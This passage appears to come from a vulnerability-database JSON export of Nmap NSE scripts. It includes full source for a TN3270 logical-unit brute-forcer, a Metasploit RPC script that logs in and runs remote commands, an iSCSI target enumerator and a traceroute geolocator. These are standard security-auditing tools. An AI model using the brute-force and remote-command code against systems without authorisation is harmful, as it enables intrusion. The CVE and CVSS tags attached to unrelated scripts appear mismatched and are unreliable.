This stores \n-- all valid logical units.\n--@usage\n-- nmap --script lu-enum -p 23 <targets>\n--\n--@usage\n-- nmap --script lu-enum --script-args lulist=lus.txt,\n-- lu-enum.path=\"/home/dade/screenshots/\" -p 23 -sV <targets>\n--\n--@output\n-- PORT STATE SERVICE REASON VERSION\n-- 23/tcp open tn3270 syn-ack IBM Telnet TN3270 (TN3270E)\n-- | lu-enum: \n-- | Logical Units: \n-- | LU:BSLVLU69 - Valid credentials\n-- |_ Statistics: Performed 7 guesses in 7 seconds, average tps: 1.0\n-- \n-- @changelog\n-- 2019-02-04 - v0.1 - created by Soldier of Fortran\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\n--- Saves the TN3270E terminal screen to disk\n--\n-- @param filename string containing the name and full path to the file\n-- @param data contains the data\n-- @return status true on success, false on failure\n-- @return err string containing error message if status is false\nlocal function save_screens( filename, data )\n local f = io.open( filename, \"w\")\n if not f then return false, (\"Failed to open file (%s)\"):format(filename) end\n if not(f:write(data)) then return false, (\"Failed to write file (%s)\"):format(filename) end\n f:close()\n return true\nend\n\n--- Compares two screens and returns the difference as a percentage\n--\n-- @param1 the original screen\n-- @param2 the screen to compare to\nlocal function screen_diff( orig_screen, current_screen )\n if orig_screen == current_screen then return 100 end\n if #orig_screen == 0 or #current_screen == 0 then return 0 end\n local m = 1\n for i = 1 , #orig_screen do\n if orig_screen:byte(i) == current_screen:byte(i) then\n m = m + 1\n end\n end\n return (m/1920)*100\nend\n\nDriver = {\n new = function(self, host, port, options)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.options = 
options\n o.tn3270 = tn3270.Telnet:new()\n return o\n end,\n connect = function( self )\n return true\n end,\n disconnect = function( self )\n self.tn3270:disconnect()\n self.tn3270 = nil\n end,\n login = function (self, user, pass) -- pass is actually the username we want to try\n local path = self.options['path']\n local original = self.options['no_lu']\n local threshold = 90\n stdnse.verbose(2,\"Trying Logical Unit: %s\", pass)\n self.tn3270:set_lu(pass)\n local status, err = self.tn3270:initiate(self.host,self.port)\n if not status then\n stdnse.debug(2,\"Could not initiate TN3270: %s\", err )\n stdnse.verbose(2, \"Invalid LU: %s\",string.upper(pass))\n return false, brute.Error:new( \"Invalid Logical Unit\" )\n end\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n if path ~= nil then\n stdnse.verbose(2,\"Writting screen to: %s\", path..string.upper(pass)..\".txt\")\n local status, err = save_screens(path..string.upper(pass)..\".txt\",self.tn3270:get_screen())\n if not status then\n stdnse.verbose(2,\"Failed writting screen to: %s\", path..string.upper(pass)..\".txt\")\n end\n end\n\n stdnse.debug(3, \"compare results: %s \", tostring(screen_diff(original, self.tn3270:get_screen_raw())))\n if screen_diff(original, self.tn3270:get_screen_raw()) > threshold then\n stdnse.verbose(2,'Same Screen for LU: %s',string.upper(pass))\n return false, brute.Error:new( \"Invalid Logical Unit\" )\n else\n stdnse.verbose(2,\"Valid Logical Unit: %s\",string.upper(pass))\n return true, creds.Account:new(\"LU\", string.upper(pass), creds.State.VALID)\n end\n end\n}\n\n--- Tests the target to see if we can connect with TN3270E\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @return status true on success, false on failure\nlocal function lu_test( host, port )\n local tn = tn3270.Telnet:new()\n local status, err = tn:initiate(host,port)\n \n if not status then\n stdnse.debug(1,\"[lu_test] Could not initiate TN3270: %s\", err )\n return false\n 
end\n\n stdnse.debug(2,\"[lu_test] Displaying initial TN3270 Screen:\")\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n if tn.state == tn.TN3270E_DATA then -- Could make a function in the library 'istn3270e'\n stdnse.debug(1,\"[lu_test] Orig screen: %s\", tn:get_screen_raw())\n return true, tn:get_lu(), tn:get_screen_raw()\n else \n return false, 'Not in TN3270E Mode. LU not supported.', ''\n end\n\nend\n\n-- Checks if it's a valid Logical Unit name\nlocal valid_lu = function(x)\n return (string.len(x) <= 8 and string.match(x,\"[%w@#%$]\"))\nend\n\n-- iterator function\nfunction iter(t)\n local i, val\n return function()\n i, val = next(t, i)\n return val\n end\nend\n\naction = function(host, port)\n local lu_id_file = stdnse.get_script_args(\"lulist\")\n local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') -- Folder for screen grabs\n local logical_units = {}\n lu_id_file = ((lu_id_file and nmap.fetchfile(lu_id_file)) or lu_id_file) \n\n local status, lu, orig_screen = lu_test( host, port )\n if status then\n \n \n if not lu_id_file then\n -- we have to do this here because we don't have an LU to use for the template until now\n stdnse.debug(3, \"No LU list provided, auto generating a list using template: %s##\", lu:sub(1, (#lu-2)))\n for i=1,99 do\n table.insert(logical_units, lu:sub(1, (#lu-2)) .. 
string.format(\"%02d\", i))\n end\n else \n for l in io.lines(lu_id_file) do\n local cleaned_line = string.gsub(l,\"[\\r\\n]\",\"\")\n if not cleaned_line:match(\"#!comment:\") then\n table.insert(logical_units, cleaned_line)\n end\n end\n end\n \n \n -- Make sure we pass the original screen we got to the brute \n local options = { no_lu = orig_screen, path = path }\n if path ~= nil then stdnse.verbose(2,\"Saving Screenshots to: %s\", path) end\n local engine = brute.Engine:new(Driver, host, port, options)\n engine.options.script_name = SCRIPT_NAME\n engine:setPasswordIterator(unpwdb.filter_iterator(iter(logical_units), valid_lu))\n engine.options.passonly = true\n engine.options:setTitle(\"Logical Units\")\n local status, result = engine:start()\n return result\n else\n stdnse.debug(1,\"Not in TN3270E mode, LU not supported.\")\n return lu\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:56", "description": "Gathers info from the Metasploit rpc service. It requires a valid login pair. After authentication it tries to determine Metasploit version and deduce the OS type. Then it creates a new console and executes few commands to get additional info. \n\nReferences: \n\n * <http://wiki.msgpack.org/display/MSGPACK/Format+specification>\n * <https://community.rapid7.com/docs/DOC-1516> Metasploit RPC API Guide\n\n### See also:\n\n * [ metasploit-msgrpc-brute.nse ](<../scripts/metasploit-msgrpc-brute.html>)\n\n## Script Arguments \n\n#### metasploit-info.password \n\nValid metasploit rpc password (required)\n\n#### metasploit-info.command \n\nCustom command to run on the server (optional)\n\n#### metasploit-info.username \n\nValid metasploit rpc username (required)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. 
\n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap <target> --script=metasploit-info --script-args username=root,password=root\n\n## Script Output \n \n \n 55553/tcp open metasploit-msgrpc syn-ack\n | metasploit-info:\n | Metasploit version: 4.4.0-dev Ruby version: 1.9.3 i386-mingw32 2012-02-16 API version: 1.0\n | Additional info:\n | Host Name: WIN\n | OS Name: Microsoft Windows XP Professional\n | OS Version: 5.1.2600 Service Pack 3 Build 2600\n | OS Manufacturer: Microsoft Corporation\n | OS Configuration: Standalone Workstation\n | OS Build Type: Uniprocessor Free\n | ..... lots of other info ....\n | Domain: WORKGROUP\n |_ Logon Server: \\\\BLABLA\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [http](<../lib/http.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-07-08T10:34:41", "type": "nmap", "title": "metasploit-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:METASPLOIT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/metasploit-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal http = require \"http\"\n\ndescription = [[\nGathers info from the Metasploit rpc service. It requires a valid login pair.\nAfter authentication it tries to determine Metasploit version and deduce the OS\ntype. Then it creates a new console and executes few commands to get\nadditional info.\n\nReferences:\n* http://wiki.msgpack.org/display/MSGPACK/Format+specification\n* https://community.rapid7.com/docs/DOC-1516 Metasploit RPC API Guide\n]]\n\n---\n--@usage\n-- nmap <target> --script=metasploit-info --script-args username=root,password=root\n--@output\n-- 55553/tcp open metasploit-msgrpc syn-ack\n-- | metasploit-info:\n-- | Metasploit version: 4.4.0-dev Ruby version: 1.9.3 i386-mingw32 2012-02-16 API version: 1.0\n-- | Additional info:\n-- | Host Name: WIN\n-- | OS Name: Microsoft Windows XP Professional\n-- | OS Version: 5.1.2600 Service Pack 3 Build 2600\n-- | OS Manufacturer: Microsoft Corporation\n-- | OS Configuration: Standalone Workstation\n-- | OS Build Type: Uniprocessor Free\n-- | ..... 
lots of other info ....\n-- | Domain: WORKGROUP\n-- |_ Logon Server: \\\\BLABLA\n--\n-- @args metasploit-info.username Valid metasploit rpc username (required)\n-- @args metasploit-info.password Valid metasploit rpc password (required)\n-- @args metasploit-info.command Custom command to run on the server (optional)\n--\n-- @see metasploit-msgrpc-brute.nse\n\n\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\",\"safe\"}\n\nportrule = shortport.port_or_service(55553,\"metasploit-msgrpc\")\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\nlocal arg_command = stdnse.get_script_args(SCRIPT_NAME .. \".command\")\nlocal os_type\n\n-- returns a \"prefix\" that msgpack uses for strings\nlocal get_prefix = function(data)\n if #data <= 31 then\n return string.pack(\"B\", 0xa0 + #data)\n else\n return \"\\xda\" .. string.pack(\">I2\", #data)\n end\nend\n\n-- returns a msgpacked data for console.read\nlocal encode_console_read = function(method,token, console_id)\n return \"\\x93\" .. get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token .. get_prefix(console_id) .. console_id\nend\n\n-- returns a msgpacked data for console.write\nlocal encode_console_write = function(method, token, console_id, command)\n return \"\\x94\" .. get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token .. get_prefix(console_id) .. console_id .. get_prefix(command) .. command\nend\n\n-- returns a msgpacked data for auth.login\nlocal encode_auth = function(username, password)\n local method = \"auth.login\"\n return \"\\x93\\xaa\" .. method .. get_prefix(username) .. username .. get_prefix(password) .. password\nend\n\n-- returns a msgpacked data for any method without extra parameters\nlocal encode_noparam = function(token,method)\n -- token is always the same length\n return \"\\x92\" .. 
get_prefix(method) .. method .. \"\\xda\\x00\\x20\" .. token\nend\n\n-- does the actual call with specified, pre-packed data\n-- and returns the response\nlocal msgrpc_call = function(host, port, msg)\n local data\n local options = {\n header = {\n [\"Content-Type\"] = \"binary/message-pack\"\n }\n }\n data = http.post(host,port, \"/api/\",options, nil , msg)\n if data and data.status and tostring( data.status ):match( \"200\" ) then\n return data.body\n end\n return nil\nend\n\n-- auth.login wrapper, returns the auth token\nlocal login = function(username, password,host,port)\n\n local data = msgrpc_call(host, port, encode_auth(username,password))\n\n if data then\n local start = string.find(data,\"success\")\n if start > -1 then\n -- get token\n local token = string.sub(string.sub(data,start),17) -- \"manually\" unpack token\n return true, token\n else\n return false, nil\n end\n end\n stdnse.debug1(\"something is wrong:\" .. data )\n return false, nil\nend\n\n-- core.version wrapper, returns version info, and sets the OS type\n-- so we can decide which commands to send later\nlocal get_version = function(host, port, token)\n local msg = encode_noparam(token,\"core.version\")\n\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n -- get version, ruby version, api version\n local start = string.find(data,\"version\")\n local metasploit_version\n local ruby_version\n local api_version\n if start then\n metasploit_version = string.sub(string.sub(data,start),9)\n start = string.find(metasploit_version,\"ruby\")\n start = start - 2\n metasploit_version = string.sub(metasploit_version,1,start)\n start = string.find(data,\"ruby\")\n ruby_version = string.sub(string.sub(data,start),6)\n start = string.find(ruby_version,\"api\")\n start = start - 2\n ruby_version = string.sub(ruby_version,1,start)\n start = string.find(data,\"api\")\n api_version = string.sub(string.sub(data,start),5)\n -- put info in a table and parse for OS detection and other 
info\n port.version.name = \"metasploit-msgrpc\"\n port.version.product = metasploit_version\n port.version.name_confidence = 10\n nmap.set_port_version(host,port)\n local info = \"Metasploit version: \" .. metasploit_version .. \" Ruby version: \" .. ruby_version .. \" API version: \" .. api_version\n if string.find(ruby_version,\"mingw\") < 0 then\n os_type = \"linux\" -- assume linux for now\n else -- mingw compiler means it's a windows build\n os_type = \"windows\"\n end\n stdnse.debug1(\"%s\", info)\n return info\n end\n end\n return nil\nend\n\n-- console.create wrapper, returns console_id\n-- which we can use to interact with metasploit further\nlocal create_console = function(host,port,token)\n local msg = encode_noparam(token,\"console.create\")\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n --get console id\n local start = string.find(data,\"id\")\n local console_id\n if start then\n console_id = string.sub(string.sub(data,start),4)\n local next_token = string.find(console_id,\"prompt\")\n console_id = string.sub(console_id,1,next_token-2)\n return console_id\n end\n end\n return nil\n\nend\n\n-- console.read wrapper\nlocal read_console = function(host,port,token,console_id)\n local msg = encode_console_read(\"console.read\",token,console_id)\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n -- check if busy\n while string.byte(data,string.len(data)) == 0xc3 do\n -- console is busy , let's retry in one second\n stdnse.sleep(1)\n data = msgrpc_call(host, port, msg)\n end\n local start = string.find(data,\"data\")\n local read_data\n if start then\n read_data = string.sub(string.sub(data,start),8)\n local next_token = string.find(read_data,\"prompt\")\n read_data = string.sub(read_data,1,next_token-2)\n return read_data\n end\n end\nend\n\n-- console.write wrapper\nlocal write_console = function(host,port,token,console_id,command)\n local msg = 
encode_console_write(\"console.write\",token,console_id,command .. \"\\n\")\n local data = msgrpc_call(host, port, msg)\n -- unpack data\n if data then\n return true\n end\n return false\nend\n\n-- console.destroy wrapper, just to be nice, we don't want console to hang ...\nlocal destroy_console = function(host,port,token,console_id)\n local msg = encode_console_read(\"console.destroy\",token,console_id)\n local data = msgrpc_call(host, port, msg)\nend\n\n-- write command and read result helper\nlocal write_read_console = function(host,port,token, console_id,command)\n if write_console(host,port,token,console_id, command) then\n local read_data = read_console(host,port,token,console_id)\n if read_data then\n read_data = string.sub(read_data,string.find(read_data,\"\\n\")+1) -- skip command echo\n return read_data\n end\n end\n return nil\nend\n\naction = function( host, port )\n if not arg_username or not arg_password then\n stdnse.debug1(\"This script requires username and password supplied as arguments\")\n return false\n end\n\n -- authenticate\n local status, token = login(arg_username,arg_password,host,port)\n if status then\n -- get version info\n local info = get_version(host,port,token)\n local console_id = create_console(host,port,token)\n if console_id then\n local read_data = read_console(host,port,token,console_id) -- first read the banner/ascii art\n stdnse.debug2(\"%s\", read_data) -- print the nice looking banner if dbg level high enough :)\n if read_data then\n if os_type == \"linux\" then\n read_data = write_read_console(host,port,token,console_id, \"uname -a\")\n if read_data then\n info = info .. \"\\nAdditional info: \" .. read_data\n end\n read_data = write_read_console(host,port,token,console_id, \"id\")\n if read_data then\n info = info .. 
read_data\n end\n elseif os_type == \"windows\" then\n read_data = write_read_console(host,port,token,console_id, \"systeminfo\")\n if read_data then\n stdnse.debug2(\"%s\", read_data) -- print whole info if dbg level high enough\n local stop = string.find(read_data,\"Hotfix\") -- trim data down , systeminfo return A LOT\n read_data = string.sub(read_data,1,stop-2)\n info = info .. \"\\nAdditional info: \\n\" .. read_data\n end\n end\n if arg_command then\n read_data = write_read_console(host,port,token,console_id, arg_command)\n if read_data then\n info = info .. \"\\nCustom command output: \" .. read_data\n end\n end\n if read_data then\n -- let's be nice and close the console\n destroy_console(host,port,token,console_id)\n end\n end\n end\n if info then\n return stdnse.format_output(true,info)\n end\n end\n return false\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:21", "description": "Collects and displays information from remote iSCSI targets.\n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 3260/tcp open iscsi\n | iscsi-info:\n | iqn.2006-01.com.openfiler:tsn.c8c08cad469d\n | Address: 192.168.56.5:3260,1\n | Authentication: NOT required\n | iqn.2006-01.com.openfiler:tsn.6aea7e052952\n | Address: 192.168.56.5:3260,1\n | Authentication: required\n |_ Auth reason: Authentication failure\n \n\n## Requires \n\n * [iscsi](<../lib/iscsi.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, 
"published": "2010-12-10T23:20:59", "type": "nmap", "title": "iscsi-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:ISCSI-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/iscsi-info.html", "sourceData": "local iscsi = require \"iscsi\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nCollects and displays information from remote iSCSI targets.\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE\n-- 3260/tcp open iscsi\n-- | iscsi-info:\n-- | iqn.2006-01.com.openfiler:tsn.c8c08cad469d\n-- | Address: 192.168.56.5:3260,1\n-- | Authentication: NOT required\n-- | iqn.2006-01.com.openfiler:tsn.6aea7e052952\n-- | Address: 192.168.56.5:3260,1\n-- | Authentication: required\n-- |_ Auth reason: Authentication failure\n--\n-- @xmloutput\n-- <table key=\"iqn.2006-01.com.openfiler:tsn.c8c08cad469d\">\n-- <elem key=\"Address\">192.168.56.5:3260,1</elem>\n-- <elem key=\"Authentication\">NOT required</elem>\n-- </table>\n-- <table key=\"iqn.2006-01.com.openfiler:tsn.6aea7e052952\">\n-- <elem key=\"Address\">192.168.56.5:3260,1</elem>\n-- <elem key=\"Authentication\">required</elem>\n-- <elem key=\"Auth reason\">Authentication failure</elem>\n-- </table>\n\n-- Version 0.2\n-- Created 2010/11/18 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 2010/11/28 - v0.2 - improved error handling <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as 
Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\", \"discovery\"}\n\n\nportrule = shortport.portnumber(3260, \"tcp\", {\"open\", \"open|filtered\"})\n\n-- Attempts to determine whether authentication is required or not\n--\n-- @return status true on success false on failure\n-- @return result true if auth is required false if not\n-- err string containing error message\nlocal function requiresAuth( host, port, target )\n local helper = iscsi.Helper:new( host, port )\n local errors = iscsi.Packet.LoginResponse.Errors\n\n local status, err = helper:connect()\n if ( not(status) ) then return false, \"Failed to connect\" end\n\n local response\n status, response = helper:login( target )\n if ( not(status) ) then return false, response:getErrorMessage() end\n\n if ( status and response:getErrorCode() == errors.SUCCESS) then\n -- try to logout\n status = helper:logout()\n end\n\n status = helper:close()\n\n return true, \"Authentication successful\"\nend\n\naction = function( host, port )\n\n local helper = iscsi.Helper:new( host, port )\n\n local status = helper:connect()\n if ( not(status) ) then\n stdnse.debug1(\"failed to connect to server\" )\n return\n end\n\n local records\n status, records = helper:discoverTargets()\n if ( not(status) ) then\n stdnse.debug1(\"failed to discover targets\" )\n return\n end\n status = helper:logout()\n status = helper:close()\n\n local result = stdnse.output_table()\n for _, record in ipairs(records) do\n local result_part = stdnse.output_table()\n for _, addr in ipairs( record.addr ) do\n result_part[\"Address\"] = addr\n end\n\n local status, err = requiresAuth( host, port, record.name )\n if ( not(status) ) then\n result_part[\"Authentication\"] = \"required\"\n result_part[\"Auth reason\"] = err\n else\n result_part[\"Authentication\"] = \"NOT required\"\n end\n result[record.name] = result_part\n end\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2022-02-15T09:33:24", "description": "Lists the geographic locations of each hop in a traceroute and optionally saves the results to a KML file, plottable on Google earth and maps.\n\n## Script Arguments \n\n#### traceroute-geolocation.kmlfile \n\nfull path and name of file to write KML data to. The KML file can be used in Google earth or maps to plot the traceroute data.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --traceroute --script traceroute-geolocation\n \n\n## Script Output \n \n \n | traceroute-geolocation:\n | hop RTT ADDRESS GEOLOCATION\n | 1 ...\n | 2 ...\n | 3 ...\n | 4 ...\n | 5 16.76 e4-0.barleymow.stk.router.colt.net (194.68.128.104) 62,15 Sweden (Unknown)\n | 6 48.61 te0-0-2-0-crs1.FRA.router.colt.net (212.74.65.49) 54,-2 United Kingdom (Unknown)\n | 7 57.16 87.241.37.146 42,12 Italy (Unknown)\n | 8 157.85 212.162.64.146 42,12 Italy (Unknown)\n | 9 ...\n |_ 10 ...\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [json](<../lib/json.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, 
"impactScore": 5.9}, "published": "2012-04-17T19:39:27", "type": "nmap", "title": "traceroute-geolocation NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-09T00:15:07", "id": "NMAP:TRACEROUTE-GEOLOCATION.NSE", "href": "https://nmap.org/nsedoc/scripts/traceroute-geolocation.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal json = require \"json\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nLists the geographic locations of each hop in a traceroute and optionally\nsaves the results to a KML file, plottable on Google earth and maps.\n]]\n\n---\n-- @usage\n-- nmap --traceroute --script traceroute-geolocation\n--\n-- @output\n-- | traceroute-geolocation:\n-- | hop RTT ADDRESS GEOLOCATION\n-- | 1 ...\n-- | 2 ...\n-- | 3 ...\n-- | 4 ...\n-- | 5 16.76 e4-0.barleymow.stk.router.colt.net (194.68.128.104) 62,15 Sweden (Unknown)\n-- | 6 48.61 te0-0-2-0-crs1.FRA.router.colt.net (212.74.65.49) 54,-2 United Kingdom (Unknown)\n-- | 7 57.16 87.241.37.146 42,12 Italy (Unknown)\n-- | 8 157.85 212.162.64.146 42,12 Italy (Unknown)\n-- | 9 ...\n-- |_ 10 ...\n-- @xmloutput\n-- <table>\n-- <elem key=\"hop\">1</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">2</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">3</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">4</elem>\n-- </table>\n-- <table>\n-- <elem 
key=\"hop\">5</elem>\n-- <elem key=\"rtt\">16.76</elem>\n-- <elem key=\"ip\">194.68.128.104</elem>\n-- <elem key=\"hostname\">e4-0.barleymow.stk.router.colt.net</elem>\n-- <elem key=\"lat\">62</elem>\n-- <elem key=\"lon\">15</elem>\n-- </table>\n-- <table>\n-- <elem key=\"hop\">6</elem>\n-- <elem key=\"rtt\">48.61</elem>\n-- <elem key=\"ip\">212.74.65.49</elem>\n-- <elem key=\"hostname\">te0-0-2-0-crs1.FRA.router.colt.net</elem>\n-- <elem key=\"lat\">54</elem>\n-- <elem key=\"lon\">-2</elem>\n-- </table>\n--\n-- @args traceroute-geolocation.kmlfile full path and name of file to write KML\n-- data to. The KML file can be used in Google earth or maps to plot the\n-- traceroute data.\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"external\", \"discovery\"}\n\nlocal arg_kmlfile = stdnse.get_script_args(SCRIPT_NAME .. \".kmlfile\")\n\nhostrule = function(host)\n if ( not(host.traceroute) ) then\n return false\n end\n return true\nend\n\n--\n-- GeoPlugin requires no API key and has no limitations on lookups\n--\nlocal function geoLookup(ip, no_cache)\n local output = stdnse.registry_get({SCRIPT_NAME, ip})\n if output then return output end\n\n local response = http.get(\"www.geoplugin.net\", 80, \"/json.gp?ip=\"..ip, {any_af=true})\n local stat, loc = json.parse(response.body)\n\n local get_value = function (d)\n local t = type(d)\n return (t == \"string\" or t == \"number\") and d or nil\n end\n\n if not (stat\n and get_value(loc.geoplugin_latitude)\n and get_value(loc.geoplugin_longitude)) then\n return nil\n end\n output = {\n lat = loc.geoplugin_latitude,\n lon = loc.geoplugin_longitude,\n reg = get_value(loc.geoplugin_regionName) or \"Unknown\",\n ctry = get_value(loc.geoplugin_countryName) or \"Unknown\"\n }\n if not no_cache then\n stdnse.registry_add_table({SCRIPT_NAME}, ip, output)\n end\n return output\nend\n\nlocal function createKMLFile(filename, coords)\n local header = 
'<?xml version=\"1.0\" encoding=\"UTF-8\"?><kml xmlns=\"http://earth.google.com/kml/2.0\"><Document><Placemark><LineString><coordinates>\\r\\n'\n local footer = '</coordinates></LineString><Style><LineStyle><color>#ff0000ff</color></LineStyle></Style></Placemark></Document></kml>'\n\n local output = {}\n for _, coord in ipairs(coords) do\n output[#output+1] = (\"%s,%s, 0.\\r\\n\"):format(coord.lon, coord.lat)\n end\n\n local f = io.open(filename, \"w\")\n if ( not(f) ) then\n return false, \"Failed to create KML file\"\n end\n f:write(header .. table.concat(output) .. footer)\n f:close()\n\n return true\nend\n\n-- Tables used to accumulate output.\nlocal output_structured = {}\nlocal output = tab.new(4)\nlocal coordinates = {}\n\nlocal function output_hop(count, ip, name, rtt, geo)\n if ip then\n local label\n if name then\n label = (\"%s (%s)\"):format(name or \"\", ip)\n else\n label = (\"%s\"):format(ip)\n end\n if geo then\n table.insert(output_structured, { hop = count, ip = ip, hostname = name, rtt = (\"%.2f\"):format(rtt), lat = geo.lat, lon = geo.lon })\n tab.addrow(output, count, (\"%.2f\"):format(rtt), label, (\"%.3f,%.3f %s (%s)\"):format(geo.lat, geo.lon, geo.ctry, geo.reg))\n table.insert(coordinates, { hop = count, lat = geo.lat, lon = geo.lon })\n else\n table.insert(output_structured, { hop = count, ip = ip, hostname = name, rtt = (\"%.2f\"):format(rtt) })\n tab.addrow(output, count, 